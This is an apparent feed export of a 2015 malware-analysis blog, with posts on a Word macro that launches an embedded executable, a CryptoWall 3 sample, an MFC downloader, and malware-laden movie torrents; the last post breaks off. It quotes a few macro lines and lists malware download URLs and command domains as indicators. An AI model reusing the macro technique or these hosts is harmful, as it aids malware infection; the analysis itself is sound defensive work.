tag:blogger.com,1999:blog-12279344270042369332024-03-04T21:32:41.983-08:00Anti-Malware LaboratoryYet Another Malware BlogUnknownnoreply@blogger.comBlogger62125tag:blogger.com,1999:blog-1227934427004236933.post-53770194715393350822015-10-09T00:39:00.000-07:002015-10-09T03:48:01.279-07:00Another Macro Script Technique in Executing MalwareRecently I came across with a macro malware that uses a technique quite new to me. If macro is enabled, macro script does the following:<br />
<br />
<ol>
<li>Save the Doc file as RTF file, 300.rtf and 301.rtf</li>
<li>Open the 300.rtf file with an embedded PE file</li>
<li>Then execute the PE file</li>
</ol>
Lets start analyzing the file and see how it successfully used the above trick.<br />
<br />
Upon inspecting the file in Hiew we could see that there is an embedded PE file. But by simply opening the file in Word doesn't mean that the PE file will run in the system, but with the use of macro script that is possible.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiApxq_r9V5SgTteetourGspEsHQIOtwRZQC58kGEaP-p2xnvcujn2MgZGcf6aIKqXxkJU63rzkFwJsAcVJSDN39f20FlQviGnCvtVe0EqGhPs2FZ4xFbAl_xyf3cfvmrMh6jNwmiCAAZA/s1600/embedded+PE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="194" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiApxq_r9V5SgTteetourGspEsHQIOtwRZQC58kGEaP-p2xnvcujn2MgZGcf6aIKqXxkJU63rzkFwJsAcVJSDN39f20FlQviGnCvtVe0EqGhPs2FZ4xFbAl_xyf3cfvmrMh6jNwmiCAAZA/s320/embedded+PE.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs4qCApNQwtgb1cJNGkLKxbbnlNwQeXYNGI3Gi_vYdUAoxulO6uX-ynE9qPsa8ZlqcalsL8vVfpDHq7Lqy9nBz1vM2l_7KJkx5vKqJ8X0IYDdGZV5sWxE1oHVwXILjQaBNaII9EFeU_iI/s1600/macro.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs4qCApNQwtgb1cJNGkLKxbbnlNwQeXYNGI3Gi_vYdUAoxulO6uX-ynE9qPsa8ZlqcalsL8vVfpDHq7Lqy9nBz1vM2l_7KJkx5vKqJ8X0IYDdGZV5sWxE1oHVwXILjQaBNaII9EFeU_iI/s320/macro.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i>Existing macro script in files. These macro scripts are password protected.</i></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU7H3XLlhbzgLoIRcFqHUuvj9_xi5fbhLUhYBQlyGcs4eqm1FKoxh6dZGwFckvWBM-quElKqp239VmbpDOdyLReKLyee9UxbiGUH1Ocm2Fs_gzL9uVLABAZuN70CYx5INv4oK_pgDiWpk/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU7H3XLlhbzgLoIRcFqHUuvj9_xi5fbhLUhYBQlyGcs4eqm1FKoxh6dZGwFckvWBM-quElKqp239VmbpDOdyLReKLyee9UxbiGUH1Ocm2Fs_gzL9uVLABAZuN70CYx5INv4oK_pgDiWpk/s320/1.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i>Extracted Macro script</i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: left;">
By inspecting 300.rtf we could notice that there is an embedded object. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDP5rhdBSYANGPA5rCVq9WA125FKzPWkx3pgUpIPd8WmtC1yCzYcdcIsn0_gqbYHz8-0hKolHgGsWKItUQq0fmo5MoqNRAwDUt4bKY1TozNufN_H1H8kfbS-FZrxLSM4Klp7lBwZBcczw/s1600/rtf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDP5rhdBSYANGPA5rCVq9WA125FKzPWkx3pgUpIPd8WmtC1yCzYcdcIsn0_gqbYHz8-0hKolHgGsWKItUQq0fmo5MoqNRAwDUt4bKY1TozNufN_H1H8kfbS-FZrxLSM4Klp7lBwZBcczw/s320/rtf.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEuBs-233nQJgNO6uCYye7lNMuIRQOq_mqAGTmZYbJwN3kFt3BpDcaYaDZdommnGUCN_eM_LKULo55PclYbUxNtwwMMVnZVAwUtRxuO9L7JZ-6C9NVNELBo6TaeJSGyBNXHkcc7LNtx3I/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEuBs-233nQJgNO6uCYye7lNMuIRQOq_mqAGTmZYbJwN3kFt3BpDcaYaDZdommnGUCN_eM_LKULo55PclYbUxNtwwMMVnZVAwUtRxuO9L7JZ-6C9NVNELBo6TaeJSGyBNXHkcc7LNtx3I/s320/12.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Using the following instructions macro file were able to open 300.rtf, embedded PE file will be extracted to TEMP folder. Thus, macro script were able to successfully execute the file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
Set sttKaka = CreateObject("Word.Application")</div>
<div class="separator" style="clear: both;">
sttKaka.Visible = False</div>
<div class="separator" style="clear: both;">
Set docWord = sttKaka.Documents.Open(TCA)</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHdqC_vlWp8PQT6bnob6l1ddTsFeSrgZaUDJLCDYi365WyPF5fzjVtpMcl570eAP5U_Tn7P10rqXY23G9emNOff5zWe4IjYoJuqscUAZcXV4vI4xXuFVxrTr0IcJetjCw5VaQ1h1lCEzE/s1600/process.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="28" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHdqC_vlWp8PQT6bnob6l1ddTsFeSrgZaUDJLCDYi365WyPF5fzjVtpMcl570eAP5U_Tn7P10rqXY23G9emNOff5zWe4IjYoJuqscUAZcXV4vI4xXuFVxrTr0IcJetjCw5VaQ1h1lCEzE/s320/process.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
This technique is only feasible using Microsoft Word 2010 and Microsoft Word 2013, with Microsoft 2007 and below it will encounter Privacy Warning. </div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9fF7-Kp5csbMDCjZ4kTX-yg0PxOSkIRM9BMe3yPlbBKDWhq0Oq-68Dc2KSwZc0xAbl2LcgL0SLJ5q29Gc65jN88FMKalmXyddvQ_Ok8lgaQ9h2PjB6OuJVwGGDTujfErypWResN33j14/s1600/warning.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9fF7-Kp5csbMDCjZ4kTX-yg0PxOSkIRM9BMe3yPlbBKDWhq0Oq-68Dc2KSwZc0xAbl2LcgL0SLJ5q29Gc65jN88FMKalmXyddvQ_Ok8lgaQ9h2PjB6OuJVwGGDTujfErypWResN33j14/s320/warning.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: justify;">It is highly adviseable to disable macro to avoid this type of malware from compromising your system.</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
bernadettehttp://www.blogger.com/profile/15725392824740427602noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-50284441164337884182015-08-12T01:01:00.000-07:002015-08-12T01:01:13.290-07:00New Crypto 3.0 sampleAugust 11, 2015, one of our systems managed to get a new sample belonging to the family of Cryptowall 3 (Crowti).<br />
<br />
Using ThreatSecure Networks' behavioral determination, we were able to confirm the "maliciousness" of this sample as it exhibited the following notable behaviors<br />
<br />
"Runs an exe in the system folder"<br />
"Creates a hidden file"<br />
"Known malicious behavior, Crowti related"<br />
"Opens Windows configuration files"<br />
"Searches for credentials"<br />
"Executes non-standard memory operations"<br />
"Creates a registry entry to start itself at each boot"<br />
"Disables or removes Windows services"<br />
"Checks for kernel debugger"<br />
<br />
Cryptowall is a known ransomware that encrypts files on a targeted PC. It urges the victim to pay in exchange for decrypting the "hostaged" files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn-UF52zVVuNU-wj-WQkwJbU27KE53QOwnE1uYBpKgKmJRDJKUnu4tuxshqzN1mbW4k-kea6GHK337iqM5E1ewzrnzxBZFnHA5AKRDZokcd-3xjUSXqlRUcTXF_cxiq4OSM0c6wcq6pc0/s1600/HELP_DECRYPT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn-UF52zVVuNU-wj-WQkwJbU27KE53QOwnE1uYBpKgKmJRDJKUnu4tuxshqzN1mbW4k-kea6GHK337iqM5E1ewzrnzxBZFnHA5AKRDZokcd-3xjUSXqlRUcTXF_cxiq4OSM0c6wcq6pc0/s320/HELP_DECRYPT.jpg" width="320" /></a></div>
<div style="text-align: center;">
Fig 1. HELP_DECRYPT.PNG</div>
<br />
<br />
One of the most noticeable features of this sample, is it's icon, which is technically nothing (See Fig 2)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu97WiZsYDgpUe_eakpaBuMO6XDAN1Ok3HRWby6yGosTX17HfBNWVo6_5XiMRZTqzmpGOCVaGgXMA9WC-e-TcJrAHUB65TsEwnnF6WIWSDLZPNN_n9QtNyvdeC0EJuTRu8ZIZeHBkhJBo/s1600/invisible+icon.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="229" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu97WiZsYDgpUe_eakpaBuMO6XDAN1Ok3HRWby6yGosTX17HfBNWVo6_5XiMRZTqzmpGOCVaGgXMA9WC-e-TcJrAHUB65TsEwnnF6WIWSDLZPNN_n9QtNyvdeC0EJuTRu8ZIZeHBkhJBo/s320/invisible+icon.jpg" width="320" /></a></div>
<div style="text-align: center;">
Fig 2. Notice the "invisible" icon?</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The sample also beacons out to known malicious IP addresses, attempting to download and POST data gathered from the victims PC.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
ip-addr.es</div>
<div style="text-align: left;">
myexternalip.com/raw</div>
<div style="text-align: left;">
curlmyip.com</div>
<div style="text-align: left;">
glamazona.com</div>
<div style="text-align: left;">
fortecegypt.com</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
Anonymoushttp://www.blogger.com/profile/15262957865496243491noreply@blogger.com1tag:blogger.com,1999:blog-1227934427004236933.post-43222704285463040652015-08-07T01:35:00.000-07:002015-08-07T20:24:19.285-07:00Uncovering a new MFC downloaderLast July 23, 2015, ThreatTrack's new product, <i>ThreatSecure Network (TSN),</i> uncovered a new sample that was not detected by any major antivirus vendors. Using TSN's unique behavioral determination engine, we were able to tag that a particular sample going through one of our appliances was possibly malicious.<br />
<br />
Our engine determined that it performed anomalous behaviors some of which are<br />
Nonstandard memory operations<br />
Creates suspended or unsuccessful process<br />
Sleeps for a long period of time<br />
Beacons out to remote locations<br />
<br />
Sample md5: 759c8c5b2b8cf9cd4dcbc1beee1cf3b7<br />
<br />
Looking at its internals, the sample is compiled using c++ MFC. Possibly in an attempt to make it harder for analysts to reverse engineer what it does. Delving more deeply and using tools that are on my disposal, I was able to find the function that the MFC calls that performs a malicious behavior.<br />
Initially, trying to find the malicious code is a bit tricky. The sample itself was compiled using MFC.<br />
I could also use IDA and debug it side by side with Olly, but I'm kinda lazy so I just downloaded the .lib files that would allow me to resolve the API names from the ordinals.<br />
Tracing through the calls, I found an interesting API on the MFC42.dll memory space that accepted 5 arguments (Fig 1)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFBT4vd2r8bKNN8NOx5bhvS7EkWJBztGYNjXvoNmTK4xxF97TANJwrxC89cpArzvt4u2exsEJLh9YCskQKufWThEXEBww3tdFPHR4U3EYdWgEb4bGWlVFrdY97iWVXxcOXWusvzkCryAU/s1600/createdialog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="184" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFBT4vd2r8bKNN8NOx5bhvS7EkWJBztGYNjXvoNmTK4xxF97TANJwrxC89cpArzvt4u2exsEJLh9YCskQKufWThEXEBww3tdFPHR4U3EYdWgEb4bGWlVFrdY97iWVXxcOXWusvzkCryAU/s320/createdialog.jpg" width="320" /></a></div>
<br />
<div style="text-align: center;">
Fig 1</div>
<div style="text-align: center;">
<br /></div>
The interesting part here is that this points to an API that would eventually call a function inside the sample we're debugging. Tracing a bit more and we landed on a curious set of codes that does some sort of copying.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHoWwPUdV668FVu3RytrhGM9bZkILDrUKwkzVLEduwmt5ev0WmVju4YrQvMPcJZndTbrM1YqdPdy_hAWP9Ty6jGl0KbOYCnsn5Ba0njKIqMnBJlPZJNIT-1pVkRMsW7UGe5oFX-1VavW8/s1600/initialstackcopy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHoWwPUdV668FVu3RytrhGM9bZkILDrUKwkzVLEduwmt5ev0WmVju4YrQvMPcJZndTbrM1YqdPdy_hAWP9Ty6jGl0KbOYCnsn5Ba0njKIqMnBJlPZJNIT-1pVkRMsW7UGe5oFX-1VavW8/s320/initialstackcopy.jpg" width="320" /></a></div>
<div style="text-align: center;">
Fig 2</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Fig 2 illustrates the snippet of code that copies part of the malware onto the stack and jumps to it. This in itself is malicious, as starting from Windows XP SP2, Microsoft has implemented a technology that prevents data from executing on certain memory locations (DEP).</div>
<div style="text-align: left;">
So what the engine told me about "NonStandardMemory operations" was true. What about the rest?</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
To make it easier for me, I dumped the parts of code that it copied on the stack, inserted it to a "container" file and launched IDA :) This way, even though it has several levels of encryption, I'll be able to follow the jumps and calls, and tag it while I debug it in Olly. </div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZk5LVDpO1dtmsqqAx3OpbZqJyvws3SOHUxiIuoLanWBMqVRQbHCgUfpp2LCbcgS2brdYDHe02smBhPF1q5Dqn4yyXDBBt03Z4gv-duacKoLLJgIYNoI9WUniDJMdAUCPAt5dFv524q_c/s1600/suspend.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZk5LVDpO1dtmsqqAx3OpbZqJyvws3SOHUxiIuoLanWBMqVRQbHCgUfpp2LCbcgS2brdYDHe02smBhPF1q5Dqn4yyXDBBt03Z4gv-duacKoLLJgIYNoI9WUniDJMdAUCPAt5dFv524q_c/s320/suspend.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
Fig 3</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Fig 3 Shows that multiple functions that writes code into the memory process of a suspended thread and after some time, resumes it. This in turns executes another "copy" of it in memory.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Now, this sample contains 2 more executables inside its body which are encrypted. These are the ones responsible for connecting to a remote location, in turn downloading and executing another executable in memory. Doing more research yielded the family connected to this downloader sample was also seen trying for the following remote URLs</div>
<div style="text-align: left;">
<br /></div>
<div class="MsoNormal">
89.136.39.204/loader/arisx06.exe (seen inside the sample)<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/arisx06.exe<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/loader/b0be001.exe<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/loader/cclub11.exe</div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/cclub02.exe<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/arisx06.exe<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/sdhfjkl.exe<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/pod2/xiitoui.exe<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/pod1/priyo03.exe<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/loader/cclub11.exe<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/mobile7.exe<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/loader/jera001.exe<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/pod1/priyo03.exe<o:p></o:p></div>
<div class="MsoNormal">
89.136.39.204/loader/cclub11.exe<o:p></o:p></div>
77.122.146.34/pod2/gavrill.exe<br />
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
77.122.146.34/gavrill.exe<o:p></o:p></div>
<div class="MsoNormal">
77.122.146.34/rain003.exe<o:p></o:p></div>
<div class="MsoNormal">
77.122.146.34/pod1/mobile7.exe<o:p></o:p></div>
<div class="MsoNormal">
77.122.146.34/suba002.exe<o:p></o:p></div>
<div class="MsoNormal">
77.122.146.34/loader/cclub02.exe<o:p></o:p></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
Anonymoushttp://www.blogger.com/profile/15262957865496243491noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-62745878850724817142015-05-20T06:27:00.001-07:002015-05-20T06:32:15.702-07:00[BE CAUTIOUS] Dragon Ball Z: Resurrection of F MALWARE and SCAM<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip-158DnDUHaNcCJL_ccOi1xyZ8LBswLt5eZkjWTFv88umZYEnYRS6hZxlqcJHfPtNduKcTYod5tzzQW7WO-RS-J65MJkmjntDn1tRntMbhynTG9d4mehJwDBFvNH3Rnf9VXU0egvKVkM/s1600/DBZ_THE_MOVIE_NO._15.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip-158DnDUHaNcCJL_ccOi1xyZ8LBswLt5eZkjWTFv88umZYEnYRS6hZxlqcJHfPtNduKcTYod5tzzQW7WO-RS-J65MJkmjntDn1tRntMbhynTG9d4mehJwDBFvNH3Rnf9VXU0egvKVkM/s400/DBZ_THE_MOVIE_NO._15.png" width="282" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Be wary of downloading movies in torrent sites. Executables can also be executed with a file size as huge as a gigabyte. </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">A recent Dragon Ball Z movie from Japan was released entitled Dragon Ball Z: Resurrection 'F' has been making rounds as of this writing. References at: <a href="http://en.wikipedia.org/wiki/Dragon_Ball_Z:_Resurrection_%27F%27">http://en.wikipedia.org/wiki/Dragon_Ball_Z:_Resurrection_%27F%27</a></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Searching torrents for this movie shows a small number of seeds.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR2NOleztXkxgzyy509nzyDvMIWVprITtHsxEWDKxcpcjVVkRxSFCDCFps2KY8FZYx2zLUUBLSAuFXDKWZdOvDy9YTZoX649po3NHkFWaU8_H5BM3gYikaVD2w1e4xquSQiJ2W3zRb0kI/s1600/Torrentz1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR2NOleztXkxgzyy509nzyDvMIWVprITtHsxEWDKxcpcjVVkRxSFCDCFps2KY8FZYx2zLUUBLSAuFXDKWZdOvDy9YTZoX649po3NHkFWaU8_H5BM3gYikaVD2w1e4xquSQiJ2W3zRb0kI/s400/Torrentz1.png" width="400" /></span></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Let's check the top seeded torrent's Trackers.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKhwUO9snjuuPuACBxj_Y8zOM8Dxn0No7TqtuRX94NyvBZhmGhV3RwEWWmEhh-Mg0IuGG4FjKc8wUAqAEW8XXuObgY0ilT4eO9IuX3YtxiBbir9ZLo5uMzfKRvoc92X9U4W8Ta_KPkbZA/s1600/Torrentz2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKhwUO9snjuuPuACBxj_Y8zOM8Dxn0No7TqtuRX94NyvBZhmGhV3RwEWWmEhh-Mg0IuGG4FjKc8wUAqAEW8XXuObgY0ilT4eO9IuX3YtxiBbir9ZLo5uMzfKRvoc92X9U4W8Ta_KPkbZA/s400/Torrentz2.png" width="400" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Domains points to a .coppersurfer.tk, demonii.com, and tfile.me.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Here's the interesting part.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQMCG5uwAB9TLUv23YzF-IDLdfggAyghSlJiyKoloVEY9ns75KUohbsS2MPN9-tW6HBoBEUBdHulSV7edZ0d3Doh5ChWagxvs-u_W7A_s6q0PqBwZt-fdbLAMkt9GsKzmxdlerLI3S_zA/s1600/Torrentz3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQMCG5uwAB9TLUv23YzF-IDLdfggAyghSlJiyKoloVEY9ns75KUohbsS2MPN9-tW6HBoBEUBdHulSV7edZ0d3Doh5ChWagxvs-u_W7A_s6q0PqBwZt-fdbLAMkt9GsKzmxdlerLI3S_zA/s400/Torrentz3.png" width="400" /></a></div>
<br />
<span style="font-family: Verdana, sans-serif;">Notice the .exe file name extension instead of .avi or .mkv or the like.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">All 6 torrents shown from the top points to downloading a .exe file. Could be a malware. The downloaded executable has an md5 of e62607261e5138d76497e3ccc092e20b. It is an NSIS compiled SFX.</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">But while downloading it, here's another one but rather a scam. Googling for this movie's torrent would usually end up with something like this page.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVyyBsuu-fEKIpr7iu2UbtrKuolICErWkLsPgwMDlD1ytyaMzKiXPQTSna7JHFkM2OCG8mxAF3XXNApns6ytvswPFK4otypALBEtanaF9_ssymxT1544DevjzSjEE0uh1HM2yzxW6mpv8/s1600/pirate1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVyyBsuu-fEKIpr7iu2UbtrKuolICErWkLsPgwMDlD1ytyaMzKiXPQTSna7JHFkM2OCG8mxAF3XXNApns6ytvswPFK4otypALBEtanaF9_ssymxT1544DevjzSjEE0uh1HM2yzxW6mpv8/s400/pirate1.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">Following the piratetorrents.net link directs to this page.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsb40j_jaS0yIeQzg74f9Syt4XpvyVR8AWk-zX8xZAKYbUPMaKZOSHxeogRiLXlr3e6BkphW_H5cquubia4Bk08VN3OKXCW79Ahb2RHkMhSI2ozzDiWFWy8QhvDnN1C7JJLoH-yfl4wKk/s1600/pirate2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="333" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsb40j_jaS0yIeQzg74f9Syt4XpvyVR8AWk-zX8xZAKYbUPMaKZOSHxeogRiLXlr3e6BkphW_H5cquubia4Bk08VN3OKXCW79Ahb2RHkMhSI2ozzDiWFWy8QhvDnN1C7JJLoH-yfl4wKk/s400/pirate2.png" width="400" /></a></div>
<br />
<span style="font-family: Verdana, sans-serif;">Downloading the torrent and leeching it shows these files to be downloaded.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUxvUFPa24WtJ7rFeHoa7gwkuLSOrSNMr3jEpBi5R-fKarre56LyZ5XkbKxR065Osbn0tYV2lPT8tb7-B_4KgbZ5S6mC3IRTbGBfLEJJVhYL1kJ7S42nIm5SnsnZ7HJ0UFJxofQXrBCds/s1600/pirate3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUxvUFPa24WtJ7rFeHoa7gwkuLSOrSNMr3jEpBi5R-fKarre56LyZ5XkbKxR065Osbn0tYV2lPT8tb7-B_4KgbZ5S6mC3IRTbGBfLEJJVhYL1kJ7S42nIm5SnsnZ7HJ0UFJxofQXrBCds/s400/pirate3.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">The movie is RAR compressed and is password protected. Along with the whole package is a README.txt that contains.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
